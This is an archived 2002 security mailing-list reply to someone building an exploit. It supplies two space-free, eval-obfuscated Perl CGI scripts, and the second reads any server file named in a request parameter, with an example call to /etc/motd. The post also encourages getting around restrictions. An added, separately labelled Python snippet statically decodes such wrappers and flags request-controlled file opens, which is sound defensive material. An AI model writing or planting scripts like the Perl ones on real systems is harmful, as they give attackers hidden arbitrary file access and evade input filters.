Re: Coding Conservative CGI Perl

From: Pete Krawczyk (petekat_private)
Date: Mon Jun 10 2002 - 11:59:21 PDT

    From: Justin Lavoie <acid_rainat_private>
    Date: Mon, 10 Jun 2002 00:27:05 -0500
    Subject: Coding Conservative CGI Perl
    
    }I'm working on a type of exploit and in doing so I must develop a *.cgi
    }file that'd run on a Linux and Windows box to allow me to read or upload
    }file (whatever is possible) without the use of spaces!
    
    Well, what would be wrong with:
    
    --- O< ---
    #!/usr/bin/perl
    $g=q#print*"Content-type:*text/plain\n\n";print*"Test:*foo!\n";#;
    $g=~s/\*/chr(32)/eg;eval($g);die($@)if($@);exit(0);
    --- O< ---
    
    Or, to, say, read any file on a system:
    --- O< ---
    #!/usr/bin/perl
    $g=q#use*CGI;$q=new*CGI;open(FILE,$q->param("file"))or*die("can't*open!\n");
    print("Content-type:*text/plain\n\n");print(<FILE>);exit(0);#;
    $g=~s/\*/chr(32)/eg;eval($g);die($@)if($@);exit(0);
    --- O< ---
    (change the MIME type as necessary)
    and call with .cgi?file=/etc/motd
    
    In this case, you'd replace every space with a * between the two hash
    marks, and you would have to escape any hash mark or backslash you had,
    but as you'll notice, you can do anything you'd like and have it convert
    on the fly. You could even change the * to any other character if you'd
    like.
    
    Perl is very forgiving about most environments, and you can get around 
    most restrictions if you try.
    
    -Pete K
    -- 
    Pete Krawczyk
      petek at bsod dot net
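An added example, not part of the list post: a small static decoder a reviewer can run over a script of this shape (a `q#...#` string, a `s/<char>/chr(32)/eg` substitution, then `eval`) to see what it would actually execute, without evaluating it. The sample script is constructed after the second script above, and the function names and regexes are my own.

```python
import re

# Constructed sample in the shape of the second script from the post: '*' stands
# in for spaces inside a q#...# string, which is fixed up and eval'd at run time.
SAMPLE = r'''#!/usr/bin/perl
$g=q#use*CGI;$q=new*CGI;open(FILE,$q->param("file"))or*die("can't*open!\n");
print("Content-type:*text/plain\n\n");print(<FILE>);exit(0);#;
$g=~s/\*/chr(32)/eg;eval($g);die($@)if($@);exit(0);
'''

# $name=q<delim>body<delim>;  the body may contain \<delim> and \\ escapes
Q_STRING = re.compile(r'\$(\w+)\s*=\s*q(.)((?:\\.|.)*?)\2\s*;', re.S)
# $name=~s/<char>/chr(<n>)/eg  (the char may be regex-escaped, e.g. \*)
SUBST = re.compile(r'\$(\w+)\s*=~\s*s/(\\?.)/chr\((\d+)\)/eg')
EVAL = re.compile(r'eval\s*\(\s*\$(\w+)\s*\)')


def decode_wrapper(src):
    """Statically recover the code such a wrapper would eval, without running it.
    Returns None when the q-string, the substitution and the eval do not line up
    on the same variable."""
    q, s, e = Q_STRING.search(src), SUBST.search(src), EVAL.search(src)
    if not (q and s and e) or not (q.group(1) == s.group(1) == e.group(1)):
        return None
    _name, delim, body = q.groups()
    # q// only unescapes a backslashed delimiter or backslash; all else is literal
    body = re.sub(r'\\([\\' + re.escape(delim) + '])', r'\1', body)
    placeholder = s.group(2).lstrip('\\')          # e.g. '\*' -> '*'
    return body.replace(placeholder, chr(int(s.group(3))))


def opens_request_controlled_path(decoded):
    """True when the decoded code hands a CGI parameter straight to open()."""
    return re.search(r'open\s*\([^)]*param\s*\(', decoded) is not None


if __name__ == '__main__':
    code = decode_wrapper(SAMPLE)
    print(code)
    print('opens a request-named file:', opens_request_controlled_path(code))
```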
    
    This archive was generated by hypermail 2b30 : Mon Jun 10 2002 - 13:27:00 PDT